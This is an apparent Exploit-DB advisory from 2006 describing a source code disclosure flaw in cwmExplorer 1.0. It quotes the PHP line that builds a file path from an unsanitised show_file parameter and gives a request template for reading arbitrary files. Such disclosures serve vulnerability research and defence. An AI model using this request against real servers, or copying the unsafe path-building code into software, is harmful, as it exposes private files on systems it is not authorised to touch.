cwmExplorer 1.0 - 'show_file' Source Code Disclosure

EDB-ID:

2963


Author:

ajann

Type:

webapps


Platform:

ASP

Date:

2006-12-19


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

*******************************************************************************************
# Title   :  cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
$datei = "dirs/".$d."/".$_GET[show_file];
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/index.php?d=0&show_file=[file]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-19]